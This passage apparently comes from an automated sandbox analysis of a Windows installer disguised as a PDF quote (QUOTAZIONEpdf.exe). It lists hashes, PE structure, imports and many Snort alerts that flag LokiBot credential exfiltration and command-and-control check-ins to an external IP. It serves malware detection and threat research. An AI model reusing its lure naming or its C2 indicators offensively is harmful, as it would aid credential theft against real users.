              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview: 1
              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):46
              Entropy (8bit):1.0424600748477153
              Encrypted:false
              SSDEEP:3:/lbON:u
              MD5:89CA7E02D8B79ED50986F098D5686EC9
              SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
              SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
              SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: ........................................user.

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.862243713227495
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:QUOTAZIONEpdf.exe
              File size:250601
              MD5:23b85c2f43b23b57411e4f4366a10b25
              SHA1:1511bfee72f99f691c93a1e6b070724890c6aea8
              SHA256:9ad929181f755701c0152618393ccff03e0499944c2e3f22fa2d0539347f5c45
              SHA512:7762714729e6bcbec554e573554ac5a78333a36369c3fe2a81c17fac2810b0b19fa191f05119a4805f7de27f15d2c9252ede56e3dd4b9799cce7593bbd8ae769
              SSDEEP:6144:/wC3lY9KbXDPmKY9xUa07Bv0pe59CGKZDcMbDpTHle:5q0WKASKpCyZwwDlHle
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

              File Icon

              Icon Hash:1c188bca1b2d565b

              Static PE Info

              General

              Entrypoint:0x403225
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:099c0646ea7282d232219f8807883be0

              Entrypoint Preview

              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409128h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push 00008001h
              call dword ptr [004070B4h]
              push ebx
              call dword ptr [0040727Ch]
              push 00000008h
              mov dword ptr [00423F58h], eax
              call 00007FAFA8C66570h
              mov dword ptr [00423EA4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F450h
              call dword ptr [00407158h]
              push 004091B0h
              push 004236A0h
              call 00007FAFA8C66227h
              call dword ptr [004070B0h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007FAFA8C66215h
              push ebx
              call dword ptr [0040710Ch]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423EA0h], eax
              mov eax, edi
              jne 00007FAFA8C63A3Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007FAFA8C65D08h
              push eax
              call dword ptr [0040721Ch]
              mov dword ptr [esp+1Ch], eax
              jmp 00007FAFA8C63A95h
              cmp cl, 00000020h
              jne 00007FAFA8C63A38h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007FAFA8C63A2Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [eax+eax+00h], 00000000h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x4148.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x2c0000x41480x4200False0.441169507576data5.0955746829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x2c1f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
              RT_ICON0x2e7980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294374645, next used block 4294967295EnglishUnited States
              RT_ICON0x2f8400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
              RT_DIALOG0x2fca80x100dataEnglishUnited States
              RT_DIALOG0x2fda80x11cdataEnglishUnited States
              RT_DIALOG0x2fec80x60dataEnglishUnited States
              RT_GROUP_ICON0x2ff280x30dataEnglishUnited States
              RT_MANIFEST0x2ff580x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              01/14/22-09:52:38.800709TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974280192.168.2.3104.223.93.105
              01/14/22-09:52:38.800709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3104.223.93.105
              01/14/22-09:52:38.800709TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3104.223.93.105
              01/14/22-09:52:40.325542TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974380192.168.2.3104.223.93.105
              01/14/22-09:52:40.325542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3104.223.93.105
              01/14/22-09:52:40.325542TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3104.223.93.105
              01/14/22-09:52:41.740730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3104.223.93.105
              01/14/22-09:52:41.740730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3104.223.93.105
              01/14/22-09:52:41.740730TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3104.223.93.105
              01/14/22-09:52:43.225955TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3104.223.93.105
              01/14/22-09:52:43.225955TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3104.223.93.105
              01/14/22-09:52:43.225955TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3104.223.93.105
              01/14/22-09:52:44.662959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3104.223.93.105
              01/14/22-09:52:44.662959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3104.223.93.105
              01/14/22-09:52:44.662959TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3104.223.93.105
              01/14/22-09:52:46.652463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3104.223.93.105
              01/14/22-09:52:46.652463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3104.223.93.105
              01/14/22-09:52:46.652463TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3104.223.93.105
              01/14/22-09:52:48.938222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3104.223.93.105
              01/14/22-09:52:48.938222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3104.223.93.105
              01/14/22-09:52:48.938222TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3104.223.93.105
              01/14/22-09:52:50.316402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3104.223.93.105
              01/14/22-09:52:50.316402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3104.223.93.105
              01/14/22-09:52:50.316402TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3104.223.93.105
              01/14/22-09:52:51.814681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3104.223.93.105
              01/14/22-09:52:51.814681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3104.223.93.105
              01/14/22-09:52:51.814681TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3104.223.93.105
              01/14/22-09:52:53.249069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3104.223.93.105
              01/14/22-09:52:53.249069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3104.223.93.105
              01/14/22-09:52:53.249069TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3104.223.93.105
              01/14/22-09:52:54.669016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3104.223.93.105
              01/14/22-09:52:54.669016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3104.223.93.105
              01/14/22-09:52:54.669016TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3104.223.93.105
              01/14/22-09:52:57.212577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3104.223.93.105
              01/14/22-09:52:57.212577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3104.223.93.105
              01/14/22-09:52:57.212577TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3104.223.93.105
              01/14/22-09:52:59.611440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.3104.223.93.105
              01/14/22-09:52:59.611440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.3104.223.93.105
              01/14/22-09:52:59.611440TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.3104.223.93.105
              01/14/22-09:53:02.120828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3104.223.93.105
              01/14/22-09:53:02.120828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3104.223.93.105
              01/14/22-09:53:02.120828TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3104.223.93.105
              01/14/22-09:53:03.980417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3104.223.93.105
              01/14/22-09:53:03.980417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3104.223.93.105
              01/14/22-09:53:03.980417TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3104.223.93.105
              01/14/22-09:53:06.924774TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3104.223.93.105
              01/14/22-09:53:06.924774TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3104.223.93.105
              01/14/22-09:53:06.924774TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3104.223.93.105
              01/14/22-09:53:08.606764TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3104.223.93.105
              01/14/22-09:53:08.606764TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3104.223.93.105
              01/14/22-09:53:08.606764TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3104.223.93.105
              01/14/22-09:53:10.307978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3104.223.93.105
              01/14/22-09:53:10.307978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3104.223.93.105
              01/14/22-09:53:10.307978TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3104.223.93.105
              01/14/22-09:53:11.692209TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3104.223.93.105
              01/14/22-09:53:11.692209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3104.223.93.105
              01/14/22-09:53:11.692209TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3104.223.93.105
              01/14/22-09:53:13.390692TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3104.223.93.105
              01/14/22-09:53:13.390692TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3104.223.93.105
              01/14/22-09:53:13.390692TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3104.223.93.105
              01/14/22-09:53:15.147551TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.3104.223.93.105
              01/14/22-09:53:15.147551TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.3104.223.93.105
              01/14/22-09:53:15.147551TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.3104.223.93.105
              01/14/22-09:53:16.674289TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3104.223.93.105
              01/14/22-09:53:16.674289TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3104.223.93.105
              01/14/22-09:53:16.674289TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3104.223.93.105
              01/14/22-09:53:18.230034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3104.223.93.105
              01/14/22-09:53:18.230034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3104.223.93.105
              01/14/22-09:53:18.230034TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3104.223.93.105
              01/14/22-09:53:19.843821TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.3104.223.93.105
              01/14/22-09:53:19.843821TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.3104.223.93.105
              01/14/22-09:53:19.843821TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.3104.223.93.105
              01/14/22-09:53:21.176590TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.3104.223.93.105
              01/14/22-09:53:21.176590TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.3104.223.93.105
              01/14/22-09:53:21.176590TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.3104.223.93.105
              01/14/22-09:53:22.793268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.3104.223.93.105
              01/14/22-09:53:22.793268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.3104.223.93.105
              01/14/22-09:53:22.793268TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.3104.223.93.105
              01/14/22-09:53:25.250388TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.3104.223.93.105
              01/14/22-09:53:25.250388TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.3104.223.93.105
              01/14/22-09:53:25.250388TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.3104.223.93.105
              01/14/22-09:53:26.628571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.3104.223.93.105
              01/14/22-09:53:26.628571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.3104.223.93.105
              01/14/22-09:53:26.628571TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.3104.223.93.105
              01/14/22-09:53:28.069977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.3104.223.93.105
              01/14/22-09:53:28.069977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.3104.223.93.105
              01/14/22-09:53:28.069977TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.3104.223.93.105
              01/14/22-09:53:29.435190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.3104.223.93.105
              01/14/22-09:53:29.435190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.3104.223.93.105
              01/14/22-09:53:29.435190TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.3104.223.93.105
              01/14/22-09:53:32.376585TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.3104.223.93.105
              01/14/22-09:53:32.376585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.3104.223.93.105
              01/14/22-09:53:32.376585TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.3104.223.93.105
              01/14/22-09:53:34.797108TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3104.223.93.105
              01/14/22-09:53:34.797108TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3104.223.93.105
              01/14/22-09:53:34.797108TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3104.223.93.105
              01/14/22-09:53:38.518335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3104.223.93.105
              01/14/22-09:53:38.518335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3104.223.93.105
              01/14/22-09:53:38.518335TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3104.223.93.105
              01/14/22-09:53:42.966613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.3104.223.93.105
              01/14/22-09:53:42.966613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.3104.223.93.105
              01/14/22-09:53:42.966613TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.3104.223.93.105
              01/14/22-09:53:50.386625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3104.223.93.105
              01/14/22-09:53:50.386625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3104.223.93.105
              01/14/22-09:53:50.386625TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3104.223.93.105
              01/14/22-09:53:54.269267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3104.223.93.105
              01/14/22-09:53:54.269267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3104.223.93.105
              01/14/22-09:53:54.269267TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3104.223.93.105
              01/14/22-09:53:57.036107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.3104.223.93.105
              01/14/22-09:53:57.036107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.3104.223.93.105
              01/14/22-09:53:57.036107TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.3104.223.93.105
              01/14/22-09:53:59.975080TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3104.223.93.105
              01/14/22-09:53:59.975080TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3104.223.93.105
              01/14/22-09:53:59.975080TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3104.223.93.105
              01/14/22-09:54:02.086796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.3104.223.93.105
              01/14/22-09:54:02.086796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.3104.223.93.105
              01/14/22-09:54:02.086796TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.3104.223.93.105
              01/14/22-09:54:03.505879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.3104.223.93.105
              01/14/22-09:54:03.505879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.3104.223.93.105
              01/14/22-09:54:03.505879TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3104.223.93.105
              01/14/22-09:54:04.907351TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.3104.223.93.105
              01/14/22-09:54:04.907351TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.3104.223.93.105
              01/14/22-09:54:04.907351TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.3104.223.93.105
              01/14/22-09:54:07.608302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3104.223.93.105
              01/14/22-09:54:07.608302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3104.223.93.105
              01/14/22-09:54:07.608302TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3104.223.93.105
              01/14/22-09:54:10.712952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.3104.223.93.105
              01/14/22-09:54:10.712952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.3104.223.93.105
              01/14/22-09:54:10.712952TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.3104.223.93.105
              01/14/22-09:54:14.681172TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.3104.223.93.105
              01/14/22-09:54:14.681172TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.3104.223.93.105
              01/14/22-09:54:14.681172TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.3104.223.93.105
              01/14/22-09:54:17.053161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3104.223.93.105
              01/14/22-09:54:17.053161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3104.223.93.105
              01/14/22-09:54:17.053161TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3104.223.93.105
              01/14/22-09:54:20.315523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3104.223.93.105
              01/14/22-09:54:20.315523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3104.223.93.105
              01/14/22-09:54:20.315523TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3104.223.93.105
              01/14/22-09:54:22.278675TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3104.223.93.105
              01/14/22-09:54:22.278675TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3104.223.93.105
              01/14/22-09:54:22.278675TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3104.223.93.105
              01/14/22-09:54:24.759273TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3104.223.93.105
              01/14/22-09:54:24.759273TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3104.223.93.105
              01/14/22-09:54:24.759273TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3104.223.93.105
              01/14/22-09:54:26.128942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3104.223.93.105
              01/14/22-09:54:26.128942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3104.223.93.105
              01/14/22-09:54:26.128942TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3104.223.93.105
              01/14/22-09:54:27.459033TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3104.223.93.105
              01/14/22-09:54:27.459033TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3104.223.93.105
              01/14/22-09:54:27.459033TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3104.223.93.105
              01/14/22-09:54:28.746131TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.3104.223.93.105
              01/14/22-09:54:28.746131TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.3104.223.93.105
              01/14/22-09:54:28.746131TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.3104.223.93.105
              01/14/22-09:54:30.197089TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.3104.223.93.105
              01/14/22-09:54:30.197089TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.3104.223.93.105
              01/14/22-09:54:30.197089TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.3104.223.93.105
              01/14/22-09:54:31.498490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.3104.223.93.105
